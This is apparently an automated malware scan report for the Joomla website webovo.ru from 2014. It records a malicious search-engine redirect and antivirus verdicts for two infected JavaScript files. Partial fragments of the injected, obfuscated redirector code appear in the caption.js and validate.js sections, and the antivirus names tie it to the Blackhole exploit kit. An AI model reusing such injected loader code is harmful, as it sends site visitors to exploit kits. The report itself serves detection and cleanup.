New scan:

Malware Scanner report for webovo.ru

Malicious/Suspicious/Total urls checked
2/0/18
2 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://brg-catalogues.com/mxut.html?h=2848373
52 websites infected.

The website "webovo.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://webovo.ru/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: webovo.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Thu, 25 Sep 2014 10:09:28 GMT
Location: http://brg-catalogues.com/mxut.html?h=2848373
Server: nginx
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://webovo.ru/
200 OK
Content-Length: 12746
Content-Type: text/html
clean
http://webovo.ru/media/system/js/caption.js
200 OK
Content-Length: 32531
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 3152 bytes are skipped ...
1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}

Antivirus reports:

AntiVir
JS/Redirector.PM.10
Avast
JS:Crypt-A [Trj]
Ad-Aware
Trojan.JS.Iframe.BJT
Ikarus
Trojan.Script
Rising
JS:Hack.Exploit.Script.JS.IframeRef.a!1610720
nProtect
Trojan.JS.Iframe.BJT
K7AntiVirus
Trojan ( 6e85836f0 )
Comodo
TrojWare.JS.Agent.HJ
Emsisoft
Trojan.JS.Iframe.BJT (B)
CAT-QuickHeal
JS/BlacoleRef.BA
K7GW
Exploit ( 04c556d01 )
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.233
TrendMicro
HEUR_HTJS.HDJSFN
Microsoft
Trojan:JS/Redirector.JN
Kaspersky
Trojan-Downloader.JS.Agent.gqu
MicroWorld-eScan
Trojan.JS.Iframe.BJT
Fortinet
JS/Crypt.CAAD!tr
TotalDefense
JS/BlacoleRef.M
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Agent.rrcam
ClamAV
Trojan.Blackhole-483
F-Secure
Trojan.JS.Iframe.BJT
VIPRE
Trojan-Downloader.JS.Agent.gup (v)
F-Prot
JS/Redir.JX
AVG
Script/Exploit.Kit
Norman
Downloader.HIVI
Sophos
Mal/ScrLd-A
GData
Trojan.JS.Iframe.BJT
Symantec
Trojan.Malscript!html
Commtouch
JS/Redir.JX
ESET-NOD32
JS/Agent.NEK
BitDefender
Trojan.JS.Iframe.BJT

http://webovo.ru/index.php?option=com_banners&task=click&bid=1
HTTP/1.1 303 See other
Connection: close
Date: Thu, 25 Sep 2014 10:09:30 GMT
Location: http://webovo.ru/index.php
Server: nginx
Content-Type: text/html
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3761570878738758076547a8fa90229d=34203fbbf35207a7b85e1a076c270ec7; path=/
X-Powered-By: PHP/5.2.17
clean
http://webovo.ru/index.php
200 OK
Content-Length: 12746
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=article&id=1&Itemid=2
200 OK
Content-Length: 18586
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=article&id=2&Itemid=3
200 OK
Content-Length: 19034
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=article&id=3&Itemid=4
200 OK
Content-Length: 14876
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=5
200 OK
Content-Length: 11000
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=2&Itemid=6
200 OK
Content-Length: 11008
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7
200 OK
Content-Length: 17815
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=4&Itemid=8
200 OK
Content-Length: 10978
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=9
200 OK
Content-Length: 10988
Content-Type: text/html
clean
http://webovo.ru/index.php?option=com_contact&view=contact&id=1&Itemid=10
200 OK
Content-Length: 13265
Content-Type: text/html
clean
http://webovo.ru/media/system/js/validate.js
200 OK
Content-Length: 22371
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JFormValidator = new Class({
initialize: function()
{
this.handlers = Object();
this.custom = Object();
this.setHandler('username',
function (value) {
regex = new RegExp("[\<|\>|\"|\'|\%|\;|\(|\)|\&]", "i");
return !regex.test(value);
}
);
this.setHandler('password',
function (value) {
regex=/^\S[\S ]{2,98}\S$/;
return regex.test(value);
}
);
this.setHandler('numeric
... 3319 bytes are skipped ...
1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-687!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}

Antivirus reports:

AntiVir
JS/Dldr.Agent.AX.18
Avast
JS:Crypt-A [Trj]
Ad-Aware
Trojan.JS.Iframe.BJT
Ikarus
Trojan.Script
nProtect
Trojan.JS.Iframe.BJT
K7AntiVirus
Exploit ( 04c556f11 )
TrendMicro-HouseCall
JS_BLACOLE.AJO
Comodo
TrojWare.JS.Agent.HJ
Emsisoft
Trojan.JS.Iframe.BJT (B)
CAT-QuickHeal
JS/BlacoleRef.BA
K7GW
Exploit ( 04c556f11 )
DrWeb
JS.IFrame.233
TrendMicro
JS_BLACOLE.AJO
Microsoft
Trojan:JS/Redirector.JN
Kaspersky
Trojan-Downloader.JS.Agent.gqu
MicroWorld-eScan
Trojan.JS.Iframe.BJT
Tencent
Unk.Win32.Script.400114
Fortinet
JS/Crypt.CAAD!tr
TotalDefense
JS/BlacoleRef.M
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Agent.rrcam
ClamAV
Trojan.Blackhole-483
F-Secure
Trojan.JS.Iframe.BJT
VIPRE
Trojan-Downloader.JS.Agent.gup (v)
F-Prot
JS/Redir.JX
AVG
Script/Exploit.Kit
Sophos
Mal/ScrLd-A
GData
Trojan.JS.Iframe.BJT
Symantec
Trojan.Malscript!html
Commtouch
JS/Redir.JX
AVware
Trojan-Downloader.JS.Agent.gup (v)
ESET-NOD32
JS/Agent.NEK
BitDefender
Trojan.JS.Iframe.BJT

http://webovo.ru/index.php?option=com_banners&task=click&bid=2
HTTP/1.1 303 See other
Connection: close
Date: Thu, 25 Sep 2014 10:09:37 GMT
Location: http://webovo.ru/index.php
Server: nginx
Content-Type: text/html
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3761570878738758076547a8fa90229d=c245d057368ad6e94fcd4540b0302388; path=/
X-Powered-By: PHP/5.2.17
clean
http://webovo.ru/test404page.js
HTTP/1.1 302 Found
Connection: close
Date: Thu, 25 Sep 2014 10:09:37 GMT
Location: http://err.agava.ru/vh/404.html
Server: nginx
Content-Type: text/html; charset=iso-8859-1
clean
http://err.agava.ru/vh/404.html
200 OK
Content-Length: 12338
Content-Type: text/html
clean
http://err.agava.ru/vh/js/main.js
200 OK
Content-Length: 34164
Content-Type: application/x-javascript
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=webovo.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://webovo.ru/

Result: webovo.ru is not infected or malware details are not published yet.